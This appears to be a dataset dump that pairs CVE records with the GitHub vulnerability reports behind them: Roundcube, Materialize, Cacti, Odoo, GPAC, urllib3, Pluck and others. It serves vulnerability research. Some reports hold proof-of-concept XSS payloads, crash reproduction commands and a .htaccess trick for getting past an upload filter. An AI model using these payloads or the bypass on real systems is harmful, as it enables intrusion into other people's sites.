cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2019-10740
2019-04-07T15:29:00.387
In Roundcube Webmail before 1.3.10, an attacker in possession of S/MIME or PGP encrypted emails can wrap them as sub-parts within a crafted multipart email. The encrypted part(s) can further be hidden using HTML/CSS or ASCII newline characters. This modified multipart email can be re-sent by the attacker to the intende...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00083.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*", "matchCriteriaId": "21944990-D120-49D4-8C58-2395666903D2", "versionEndExcluding": "1.3.10", "versionEndIncluding": null, "versionStartExcl...
[ "319" ]
319
https://github.com/roundcube/roundcubemail/issues/6638
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "roundcube", "roundcubemail" ]
In the scope of academic research in cooperation with Ruhr-Uni Bochum and FH Münster, Germany we discovered a security issue in Roundcube/Enigma: An attacker who is in possession of PGP encrypted messages can embed them into a multipart message and re-send them to the intended receiver. When the message is read and dec...
Decryption Oracle based on replying to PGP encrypted emails
https://api.github.com/repos/roundcube/roundcubemail/issues/6638/comments
3
2019-02-22T10:49:17Z
2019-05-11T14:25:36Z
https://github.com/roundcube/roundcubemail/issues/6638
413,348,015
6,638
306
CVE-2019-11002
2019-04-08T18:29:00.333
In Materialize through 1.0.0, XSS is possible via the Tooltip feature.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Dogfalo/materialize/issues/6286" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Thi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:materializecss:materialize:*:*:*:*:*:*:*:*", "matchCriteriaId": "16CE4215-C9F6-4B35-98B2-3E2D6F7FDF43", "versionEndExcluding": null, "versionEndIncluding": "1.0.0", "versionS...
[ "79" ]
79
https://github.com/Dogfalo/materialize/issues/6286
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Dogfalo", "materialize" ]
## Expected Behavior Don't execute html/javascript by default for Toasts, Tooltips and Autocomplete ## Current Behavior By default when you add dynamics contents like Toast, Tooltips and autocomplete you inject inputs data as HTML. I think all people who use MaterializeCss implement compontents like your example...
Security question: Use HTML by default for Toasts/Tooltips/Autocomplete and expose an XSS
https://api.github.com/repos/Dogfalo/materialize/issues/6286/comments
30
2019-02-08T16:46:36Z
2019-05-26T08:48:56Z
https://github.com/Dogfalo/materialize/issues/6286
408,234,469
6,286
307
CVE-2019-11018
2019-04-08T21:29:01.360
application\admin\controller\User.php in ThinkAdmin V4.0 does not prevent continued use of an administrator's cookie-based credentials after a password change.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zoujingli/ThinkAdmin/issues/173" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Thi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkadmin:thinkadmin:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "F18AC967-705F-4D26-ACD1-05D9DF39B4E6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "287" ]
287
https://github.com/zoujingli/ThinkAdmin/issues/173
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zoujingli", "ThinkAdmin" ]
There is a authority control&Information Disclosure vulnerability inThinkAdmin v4.0. As admin,if you change your password,your cookie won't become invalid. And it won't become invalid until the end of Life Cycle.So if attackers got admin's cookie,though traces of the attackers were found,and admin change his password...
ThinkAdmin V4.0 authority control&Information Disclosure vulnerability
https://api.github.com/repos/zoujingli/ThinkAdmin/issues/173/comments
2
2019-04-06T13:40:53Z
2019-04-08T10:43:20Z
https://github.com/zoujingli/ThinkAdmin/issues/173
430,034,837
173
308
CVE-2019-11024
2019-04-08T23:29:00.790
The load_pnm function in frompnm.c in libsixel.a in libsixel 1.8.2 has infinite recursion.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/85" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://research.loginsoft.com/bugs/15...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.2:*:*:*:*:*:*:*", "matchCriteriaId": "BAFCC979-2F4E-46A5-AC18-B6452E752D90", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "674" ]
674
https://github.com/saitoha/libsixel/issues/85
[ "Exploit", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
**Description** : we Observerd an infinite recursive loop at function load_pnm( ) at file frompnm.c which can lead to a denial of service attack. **Command** : ./img2sixel -78eIkiugv -w 4 -h 8 -q auto -l force -o out $POC **POC** : [REPRODUCER](https://github.com/SegfaultMasters/covering360/blob/master/libsexel/PO...
infinite recursive loop in load_pnm( )
https://api.github.com/repos/saitoha/libsixel/issues/85/comments
2
2019-03-29T05:47:49Z
2019-12-18T20:34:07Z
https://github.com/saitoha/libsixel/issues/85
426,827,367
85
309
CVE-2019-11025
2019-04-08T23:29:00.853
In clearFilter() in utilities.php in Cacti before 1.2.3, no escaping occurs before printing out the value of the SNMP community string (SNMP Options) in the View poller cache, leading to XSS.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/compare/6ea486a...99995bb" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*", "matchCriteriaId": "5C1989C8-DBC3-4926-8AA3-245A0E8FE2DC", "versionEndExcluding": "1.2.3", "versionEndIncluding": null, "versionStartExcluding":...
[ "79" ]
79
https://github.com/Cacti/cacti/issues/2581
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cacti", "cacti" ]
**Describe the bug** There's no escape being done before printing out the value of `SNMP community string` (SNMP Options) in the `View poller cache`. **To Reproduce** Steps to reproduce the behavior: 1. Login as normal user ( should have device creation explicitly enabled ). 2. Select create a new device from th...
When viewing poller cache, Device SNMP community is not properly escaped
https://api.github.com/repos/Cacti/cacti/issues/2581/comments
2
2019-03-28T10:14:04Z
2020-06-30T03:46:01Z
https://github.com/Cacti/cacti/issues/2581
426,407,384
2,581
310
CVE-2018-15631
2019-04-09T16:29:01.087
Improper access control in the Discuss App of Odoo Community 12.0 and earlier, and Odoo Enterprise 12.0 and earlier allows remote authenticated attackers to e-mail themselves arbitrary files from the database, via a crafted RPC request.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "security@odoo.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32516" }, { "source": "security@odoo.com", "tags": [ "Third Party Advisory" ], "url": "https://www.excellium-services.com/cert-xlm-advisory/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*", "matchCriteriaId": "A958BCBB-C656-44A5-A9A9-66A66AEA67A0", "versionEndExcluding": null, "versionEndIncluding": "12.0", "versionStartExclud...
[ "284" ]
284
https://github.com/odoo/odoo/issues/32516
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-11-28-3 Improper access control in the Discuss App of Odoo Community 12.0 and earlier, and Odoo Enterprise 12.0 and earlier allows remote authenticated attackers to e-mail themselves arbitrary files from the database, via a crafted RPC request. **Affects**: Odoo Community 12.0 and e...
[SEC] ODOO-SA-2018-11-28-3 (CVE-2018-15631) - Improper access control in the...
https://api.github.com/repos/odoo/odoo/issues/32516/comments
0
2019-04-08T13:40:55Z
2019-04-08T13:40:57Z
https://github.com/odoo/odoo/issues/32516
430,458,377
32,516
311
CVE-2018-15635
2019-04-09T16:29:01.130
Cross-site scripting vulnerability in the Discuss App of Odoo Community 12.0 and earlier, and Odoo Enterprise 12.0 and earlier allows remote attackers to inject arbitrary web script in the browser of an internal user of the system by tricking them into inviting a follower on a document with a crafted name.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "security@odoo.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32515" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32515" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*", "matchCriteriaId": "A958BCBB-C656-44A5-A9A9-66A66AEA67A0", "versionEndExcluding": null, "versionEndIncluding": "12.0", "versionStartExclud...
[ "79" ]
79
https://github.com/odoo/odoo/issues/32515
[ "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-11-28-2 Cross-site scripting vulnerability in the Discuss App of Odoo Community 12.0 and earlier, and Odoo Enterprise 12.0 and earlier allows remote attackers to inject arbitrary web script in the browser of an internal user of the system by tricking them into inviting a follower on ...
[SEC] ODOO-SA-2018-11-28-2 (CVE-2018-15635) - Cross-site scripting vulnerabil...
https://api.github.com/repos/odoo/odoo/issues/32515/comments
0
2019-04-08T13:40:52Z
2019-04-08T13:40:54Z
https://github.com/odoo/odoo/issues/32515
430,458,345
32,515
312
CVE-2018-15640
2019-04-09T16:29:01.193
Improper access control in the Helpdesk App of Odoo Enterprise 10.0 through 12.0 allows remote authenticated attackers to obtain elevated privileges via a crafted request.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE...
[ { "source": "security@odoo.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32514" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "A4C406AC-8BCE-431E-9E09-7A793E3C750F", "versionEndExcluding": null, "versionEndIncluding": "12.0", "versionStartExclu...
[ "863" ]
863
https://github.com/odoo/odoo/issues/32514
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-11-28-1 Improper access control in the Helpdesk App of Odoo Enterprise 10.0 through 12.0 allows remote authenticated attackers to obtain elevated privileges via a crafted request. **Affects**: Odoo 10.0 Enterprise through 12.0 (Enterprise Editions only) **Component**: Helpdesk **Cre...
[SEC] ODOO-SA-2018-11-28-1 (CVE-2018-15640) - Improper access control in the...
https://api.github.com/repos/odoo/odoo/issues/32514/comments
0
2019-04-08T13:40:48Z
2019-04-08T13:40:50Z
https://github.com/odoo/odoo/issues/32514
430,458,311
32,514
313
CVE-2017-18366
2019-04-15T12:30:57.697
Subrion CMS 4.1.5 has CSRF in blog/delete/.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/intelliants/subrion/issues/477" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://git...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:intelliants:subrion_cms:4.1.5:*:*:*:*:*:*:*", "matchCriteriaId": "3499035D-709C-40B3-ADE9-5B00F7790E2D", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "352" ]
352
https://github.com/intelliants/subrion/issues/477
[ "Exploit", "Third Party Advisory" ]
github.com
[ "intelliants", "subrion" ]
Hi subrion security team, ### Bug Description Cross-site request forgery(CSRF), also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. ### Steps to reprodu...
Critical : Remove Blog Post using CSRF attack
https://api.github.com/repos/intelliants/subrion/issues/477/comments
3
2017-06-30T19:41:33Z
2017-07-06T07:40:48Z
https://github.com/intelliants/subrion/issues/477
239,871,435
477
314
CVE-2018-18261
2019-04-15T12:31:20.290
In waimai Super Cms 20150505, there is an XSS vulnerability via the /admin.php/Foodcat/addsave fcname parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/caokang/waimai/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bijiadao:waimai_super_cms:20150505:*:*:*:*:*:*:*", "matchCriteriaId": "8945479A-0C5E-4FC7-9D88-BC42E8EA0C3C", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "79" ]
79
https://github.com/caokang/waimai/issues/7
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "caokang", "waimai" ]
In waimai Super Cms 20150505,there is an XSS vulnerability via the /admin.php/Foodcat/addsave fcname parameter. Payload:<script>alert(1);</script> POST /sug/waimaicmsn/waimai-master/admin.php?m=Foodcat&a=addsave HTTP/1.1 Host: xx.x.x.x:xxx User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Fire...
xss Vulnerability in Waimai Super Cms 20150505 via fcname parameter
https://api.github.com/repos/caokang/waimai/issues/7/comments
0
2018-10-11T13:51:14Z
2018-10-11T13:51:14Z
https://github.com/caokang/waimai/issues/7
369,131,484
7
315
CVE-2019-11221
2019-04-15T12:31:36.477
GPAC 0.7.1 has a buffer overflow issue in gf_import_message() in media_import.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1203" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.7.1:*:*:*:*:*:*:*", "matchCriteriaId": "2CC18384-9350-47D7-A07D-C7D29622AE9E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "787" ]
787
https://github.com/gpac/gpac/issues/1203
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
There is a buffer overflow issue in gf_import_message () function, media_import.c szMsg overflow when srt file contains more than one txt line and the line is long enough. GF_Err gf_import_message(GF_MediaImporter *import, GF_Err e, char *format, ...) { if (gf_log_tool_level_on(GF_LOG_AUTHOR, e ? GF_LOG_WARN...
buffer overflow issue 6#
https://api.github.com/repos/gpac/gpac/issues/1203/comments
6
2019-02-12T03:44:32Z
2019-04-19T09:00:55Z
https://github.com/gpac/gpac/issues/1203
409,106,668
1,203
316
CVE-2019-11222
2019-04-15T12:31:36.507
gf_bin128_parse in utils/os_divers.c in GPAC 0.7.1 has a buffer overflow issue for the crypt feature when encountering a crafted_drm_file.xml file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/f3698bb1bce62402805c3fda96551a23101a32f9" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.7.1:*:*:*:*:*:*:*", "matchCriteriaId": "2CC18384-9350-47D7-A07D-C7D29622AE9E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "787" ]
787
https://github.com/gpac/gpac/issues/1204
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
there is a buffer overflow issue for crypt feature when use a crafted_drm_file.xml file. overflow occur when use a crafted key value. root@ubuntu:/opt/niugx/cov_product/gpac/gpac-master/bin/gcc# gdb ./MP4Box (gdb) set args -crypt crafted_drm_file.xml overview.mp4 -out overview_encrypted.mp4 (gdb) r Starting p...
buffer overflow issue 7#
https://api.github.com/repos/gpac/gpac/issues/1204/comments
1
2019-02-13T07:12:39Z
2019-04-19T08:50:59Z
https://github.com/gpac/gpac/issues/1204
409,659,238
1,204
317
CVE-2019-11222
2019-04-15T12:31:36.507
gf_bin128_parse in utils/os_divers.c in GPAC 0.7.1 has a buffer overflow issue for the crypt feature when encountering a crafted_drm_file.xml file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/f3698bb1bce62402805c3fda96551a23101a32f9" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.7.1:*:*:*:*:*:*:*", "matchCriteriaId": "2CC18384-9350-47D7-A07D-C7D29622AE9E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "787" ]
787
https://github.com/gpac/gpac/issues/1205
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
there is a buffer overflow issue for crypt feature when use a crafted_drm_file.xml file. overflow occur when use a crafted ID128 value. root@ubuntu:/opt/niugx/cov_product/gpac/gpac-master/bin/gcc# gdb ./MP4Box (gdb) set args -crypt drm_file.xml overview.mp4 -out overview_encrypted.mp4 (gdb) r Starting program...
buffer overflow issue 8#
https://api.github.com/repos/gpac/gpac/issues/1205/comments
1
2019-02-13T09:49:56Z
2019-04-19T08:50:26Z
https://github.com/gpac/gpac/issues/1205
409,715,577
1,205
318
CVE-2019-11236
2019-04-15T15:29:00.637
In the urllib3 library through 1.24.1 for Python, CRLF injection is possible if the attacker controls the request parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00039.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00041.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:python:urllib3:*:*:*:*:*:*:*:*", "matchCriteriaId": "304CBF27-88DD-4DF2-8A3A-FD4C02C42895", "versionEndExcluding": null, "versionEndIncluding": "1.24.2", "versionStartExcludi...
[ "93" ]
93
https://github.com/urllib3/urllib3/issues/1553
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "urllib3", "urllib3" ]
At https://bugs.python.org/issue36276 there's an issue in Python's urllib that an attacker controlling the request parameter can inject headers by injecting CR/LF chars. A commenter mentions that the same bug is present in urllib3: https://bugs.python.org/issue36276#msg337837 So reporting it here to make sure it...
CRLF injection vulnerability
https://api.github.com/repos/urllib3/urllib3/issues/1553/comments
32
2019-03-18T17:17:07Z
2019-05-02T17:50:22Z
https://github.com/urllib3/urllib3/issues/1553
422,338,889
1,553
319
CVE-2018-20200
2019-04-18T19:29:01.347
CertificatePinner.java in OkHttp 3.x through 3.12.0 allows man-in-the-middle attackers to bypass certificate pinning by changing SSLContext and the boolean values while hooking the application. NOTE: This id is disputed because some parties don't consider this is a vulnerability. Their rationale can be found in https:/...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cxsecurity.com/issue/WLB-2018120252" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/square/okhttp/commits/m...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:squareup:okhttp:*:*:*:*:*:*:*:*", "matchCriteriaId": "F6889A8C-87B7-49BE-B316-62267FEF895E", "versionEndExcluding": null, "versionEndIncluding": "3.12.0", "versionStartExclud...
[ "295" ]
295
https://github.com/square/okhttp/issues/4967
null
github.com
[ "square", "okhttp" ]
Apparently there was [CVE-2018-20200](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20200) for an issue described as > CertificatePinner.java in OkHttp 3.x through 3.12.0 allows man-in-the-middle attackers to bypass certificate pinning by changing SSLContext and the boolean values while hooking the applica...
CVE-2018-20200: CertificatePinner.java allows man-in-the-middle attackers to bypass certificate pinning
https://api.github.com/repos/square/okhttp/issues/4967/comments
6
2019-04-19T09:16:04Z
2020-07-05T07:07:32Z
https://github.com/square/okhttp/issues/4967
435,109,866
4,967
320
CVE-2019-11344
2019-04-19T19:29:00.233
data/inc/files.php in Pluck 4.7.8 allows remote attackers to execute arbitrary code by uploading a .htaccess file that specifies SetHandler x-httpd-php for a .txt file, because only certain PHP-related filename extensions are blocked.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/72" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.c...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.8:*:*:*:*:*:*:*", "matchCriteriaId": "DFF082EE-B695-400E-BF54-FC8707FBBE3E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "434" ]
434
https://github.com/pluck-cms/pluck/issues/72
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pluck-cms", "pluck" ]
Location: https://github.com/pluck-cms/pluck/blob/master/data/inc/files.php#L40 Code: ```php <?php // ...... $blockedExtentions = array('.php','php3','php4','php5','php6','php7','phtml'); if (in_array($lastfour, $blockedExtentions) or in_array($lastfive, $blockedExtentions) ){ if (!rename('files/'.l...
file-upload vulnerability in data/inc/files.php
https://api.github.com/repos/pluck-cms/pluck/issues/72/comments
4
2019-04-09T14:45:54Z
2019-05-29T16:19:45Z
https://github.com/pluck-cms/pluck/issues/72
431,009,393
72
321
CVE-2019-11359
2019-04-20T00:29:00.480
Cross-site scripting (XSS) vulnerability in display.php in I, Librarian 4.10 allows remote attackers to inject arbitrary web script or HTML via the project parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mkucej/i-librarian/issues/138" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gith...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:i-librarian:i\\,_librarian:4.10:*:*:*:*:*:*:*", "matchCriteriaId": "C1942913-38F2-41F7-80F9-887EE83FC680", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "79" ]
79
https://github.com/mkucej/i-librarian/issues/138
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mkucej", "i-librarian" ]
## Summary The parameter `project` is not sanitized, so attackers can poison this parameter and then create a reflected XSS attack. ## PoC `http://domain.tld/display.php?browse[]=all&project=1">test</a><script>alert(123)</script>&select=desk&_=1555500329996` ## Details The flaw exists since `$project` was assi...
XSS vulnerability in display.php
https://api.github.com/repos/mkucej/i-librarian/issues/138/comments
2
2019-04-17T12:19:38Z
2019-04-17T12:30:06Z
https://github.com/mkucej/i-librarian/issues/138
434,251,771
138
322
CVE-2019-11362
2019-04-20T13:29:00.277
app/controllers/frontend/PostController.php in ROCBOSS V2.2.1 has SQL injection via the Post:doReward score paramter, as demonstrated by the /do/reward/3 URI.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/rocboss/ROCBOSS/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ]...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rocboss:rocboss:2.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "38F69F49-F233-46CC-835C-CC69EB854532", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "89" ]
89
https://github.com/rocboss/ROCBOSS/issues/12
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "rocboss", "ROCBOSS" ]
